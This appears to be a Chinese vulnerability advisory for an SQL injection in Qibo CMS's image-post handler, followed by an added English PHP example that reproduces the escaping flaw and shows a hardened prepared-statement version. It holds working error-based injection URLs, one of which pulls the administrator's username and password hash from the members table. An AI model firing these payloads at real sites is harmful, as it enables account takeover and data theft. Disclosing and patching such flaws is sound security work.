<ul><li>/zhuangxiu/inc/job/post_img.php</li></ul><pre class="">foreach( $_FILES AS $key=>$value ){ $i=(int)substr($key,10); if(is_array($value)){ $postfile=$value['tmp_name']; $array[name]=$value['name']; $array[size]=$value['size']; } else{ $postfile=$$key; $array[name]=${$key.'_name'}; $array[size]=${$key.'_size'}; } if($ftype[$i]=='in'&&$array[name]){ if(!eregi("(gif|jpg|png)$",$array[name])){ showerr("只能上传GIF,JPG,PNG格式的文件,你不能上传此文件:$array[name]"); } $array[path]=$webdb[updir]."/fenlei/$fid"; $array[updateTable]=1;//统计用户上传的文件占用空间大小 $filename=upfile($postfile,$array); $photodb[$i]="fenlei/$fid/$filename"; $smallimg=$photodb[$i].'.gif'; $Newpicpath=ROOT_PATH."$webdb[updir]/$smallimg"; gdpic(ROOT_PATH."$webdb[updir]/{$photodb[$i]}",$Newpicpath,300,220,array('fix'=>1)); if(!$rsdb[picurl]){ $rsdb[picurl]=$smallimg; if(!file_exists(ROOT_PATH."$webdb[updir]/$rsdb[picurl]")){ $rsdb[picurl]=$photodb[$i]; } $db->query("UPDATE `{$_pre}content$_erp` SET...
<ul><li>/zhuangxiu/inc/job/post_img.php</li></ul><pre class="">foreach( $_FILES AS $key=>$value ){ $i=(int)substr($key,10); if(is_array($value)){ $postfile=$value['tmp_name']; $array[name]=$value['name']; $array[size]=$value['size']; } else{ $postfile=$$key; $array[name]=${$key.'_name'}; $array[size]=${$key.'_size'}; } if($ftype[$i]=='in'&&$array[name]){ if(!eregi("(gif|jpg|png)$",$array[name])){ showerr("只能上传GIF,JPG,PNG格式的文件,你不能上传此文件:$array[name]"); } $array[path]=$webdb[updir]."/fenlei/$fid"; $array[updateTable]=1;//统计用户上传的文件占用空间大小 $filename=upfile($postfile,$array); $photodb[$i]="fenlei/$fid/$filename"; $smallimg=$photodb[$i].'.gif'; $Newpicpath=ROOT_PATH."$webdb[updir]/$smallimg"; gdpic(ROOT_PATH."$webdb[updir]/{$photodb[$i]}",$Newpicpath,300,220,array('fix'=>1)); if(!$rsdb[picurl]){ $rsdb[picurl]=$smallimg; if(!file_exists(ROOT_PATH."$webdb[updir]/$rsdb[picurl]")){ $rsdb[picurl]=$photodb[$i]; } $db->query("UPDATE `{$_pre}content$_erp` SET picurl='$rsdb[picurl]' WHERE id='$id'"); } /*加水印*/ if( $webdb[is_waterimg] && $webdb[if_gdimg] ) { include_once(ROOT_PATH."inc/waterimage.php"); $uploadfile=ROOT_PATH."$webdb[updir]/$photodb[$i]"; imageWaterMark($uploadfile,$webdb[waterpos],ROOT_PATH.$webdb[waterimg]); } } } foreach( $photodb AS $key=>$value){ if(strlen($value)>4&&!eregi("(gif|jpg|png)$",$value)){ showerr("只能上传GIF,JPG,PNG格式的文件,你不能上传此文件:$value"); } } $num=0; foreach( $photodb AS $key=>$value ){ $titledb[$key]=filtrate($titledb[$key]); $value=trim($value); $value=filtrate($value); if($titledb[$key]>100){ showerr("标题不能大于50个汉字"); } if(strlen($value)<4){ $db->query("DELETE FROM `{$_pre}pic` WHERE pid='{$piddb[$key]}' AND id='$id'"); }elseif($piddb[$key]){ $num++; $db->query("UPDATE `{$_pre}pic` SET name='{$titledb[$key]}',imgurl='$value' WHERE pid='{$piddb[$key]}'"); }elseif($value){ $num++; $db->query("INSERT INTO `{$_pre}pic` ( `id` , `fid` , `mid` , `uid` , `type` , `imgurl` , `name` ) VALUES ( '$id', '$fid', '$mid', '$lfjuid', '0', '$value', 
'{$titledb[$key]}')"); } } </pre><p>由于$imgurl未作初始化,结合全局机制,可以控制。并且当传入$tabledb为字符时,将会取$tabledb[0],所以传入单引号会截断到“\”造成单引号逃逸。</p><p>当传入:</p><pre class="">http://192.168.199.224/qibo5/zhuangxiu/job.php?photodb%5B%5D=and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)%23.jpg&piddb%5B%5D=xxx&job=post_img&titledb=%27&act=edit&_erp=xxx&id=1</pre><p>执行的SQL语句为:</p><pre class="">UPDATE `qb_zhuangxiu_pic` SET name='\',imgurl='and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)#.jpg' WHERE pid='xxx'</pre><p>页面返回: </p><p><img alt="7E050E68-5FB9-4490-A6DB-A9ECE2BC4597.png" src="https://images.seebug.org/@/uploads/1434593687080-7E050E68-5FB9-4490-A6DB-A9ECE2BC4597.png" data-image-size="980,318"><br></p><p>证明漏洞存在。</p><p>访问地址:</p><pre class="">http://192.168.199.224/qibo5/zhuangxiu/job.php?photodb%5B%5D=and (select 1 from (select count(*),concat((select concat(username,0x3a3a,password) from qb_members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23.jpg&piddb%5B%5D=xxx&job=post_img&titledb=%27&act=edit&_erp=xxx&id=1</pre><p>得到管理员帐号密码 </p>
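<p>The string-offset truncation that turns filtrate()'s \' into a bare backslash, reproduced beside a hardened version of the same update. This is an added example, not Qibo CMS code. It assumes filtrate() behaves like addslashes() for the quote character (the page only shows that it prefixes the quote with a backslash), uses the table name from the query above, and the PDO handle mentioned in the closing comment is hypothetical.</p>

```php
<?php
// Added example; not Qibo CMS code. Reproduces the string-offset truncation that
// produces name='\' in the UPDATE above, then shows a hardened form of the loop.
// Assumption: filtrate() is stood in for by addslashes().

function filtrate_stub(string $s): string {
    return addslashes($s);
}

// Mirrors the third foreach in post_img.php. $titledb, $photodb and $piddb arrive
// straight from the request via the CMS's global-import mechanism.
function vulnerable_queries($titledb, array $photodb, array $piddb): array {
    $queries = [];
    foreach ($photodb as $key => $value) {
        // If the client sent titledb as a string ("titledb='"), $titledb[$key] is a
        // one-byte string offset. filtrate_stub() returns the two-byte "\'", and PHP
        // keeps only the first byte on string-offset assignment (emitting a warning),
        // so $titledb[$key] becomes a lone backslash that escapes the closing quote.
        $titledb[$key] = filtrate_stub((string)$titledb[$key]);
        $value = filtrate_stub(trim((string)$value));
        $queries[] = "UPDATE `qb_zhuangxiu_pic` SET name='{$titledb[$key]}',imgurl='$value' WHERE pid='{$piddb[$key]}'";
    }
    return $queries;
}

// Hardened version: reject unexpected input shapes, validate the stored path
// against the format the upload code itself generates, and bind every value
// instead of interpolating it into the statement.
function hardened_statements($titledb, array $photodb, array $piddb): array {
    if (!is_array($titledb)) {
        throw new InvalidArgumentException('titledb must be an array');
    }
    $stmts = [];
    foreach ($photodb as $key => $value) {
        $title = mb_substr((string)($titledb[$key] ?? ''), 0, 50);
        $value = trim((string)$value);
        // post_img.php stores paths of the form fenlei/<fid>/<file>.<ext>; the
        // numeric <fid> and the filename character set are assumptions here.
        // Anything that does not match is rejected rather than escaped.
        if (!preg_match('~^fenlei/\d+/[\w.-]+\.(gif|jpg|png)$~i', $value)) {
            throw new InvalidArgumentException("rejected imgurl: $value");
        }
        $stmts[] = [
            'sql'    => 'UPDATE `qb_zhuangxiu_pic` SET name = ?, imgurl = ? WHERE pid = ?',
            'params' => [$title, $value, (string)($piddb[$key] ?? '')],
        ];
    }
    return $stmts;
}

// Constructed input: the parameter values from the PoC request on this page.
$titledb = "'";
$photodb = ["and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)#.jpg"];
$piddb   = ["xxx"];

echo vulnerable_queries($titledb, $photodb, $piddb)[0], "\n";

try {
    hardened_statements($titledb, $photodb, $piddb);
} catch (InvalidArgumentException $e) {
    echo "hardened: ", $e->getMessage(), "\n";
}

// With a real connection the hardened statements would run as (hypothetical $pdo):
//   foreach (hardened_statements($t, $p, $i) as $s) { $pdo->prepare($s['sql'])->execute($s['params']); }
```

<p>The vulnerable function emits the exact statement shown above, with the single quote in titledb collapsed to a backslash. The hardened function refuses the string-shaped titledb before any SQL is built; even if the shape check were missing, the placeholders leave no quote for a stray backslash to escape.</p>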